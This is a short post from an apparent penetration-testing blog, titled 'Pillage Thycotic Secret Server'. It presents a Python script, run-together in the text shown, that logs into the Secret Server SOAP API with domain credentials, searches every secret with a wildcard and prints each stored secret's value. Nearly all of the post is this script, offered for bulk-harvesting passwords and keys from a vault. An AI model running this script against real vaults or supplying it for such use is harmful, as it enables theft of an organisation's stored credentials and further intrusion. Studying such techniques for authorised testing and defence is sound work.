A blog about coding, Infosec, penetration testing, and random topics
Thursday, December 12, 2019
Pillage Thycotic Secret Server
If you want to grab all the secrets from Thycotic's secret server, use the SOAP API to pull them out. Assuming you have valid domain creds, run the following script.
#!/usr/bin/env python3fromzeepimportClient#Connect to the soap api endpointclient=Client("https://secretserver.example.com/SecretServer/webservices/SSWebservice.asmx?wsdl")#grab your auth token for all your requeststoken=client.service.Authenticate("user_here","pass_here","","domain_here")#grab all secrets for the usersearchSecret=client.service.SearchSecrets(token.Token,"*")#output the secret values for each secretforsecretinsearchSecret.SecretSummaries.SecretSummary:print(client.service.GetSecret(token.Token,secret['SecretId']))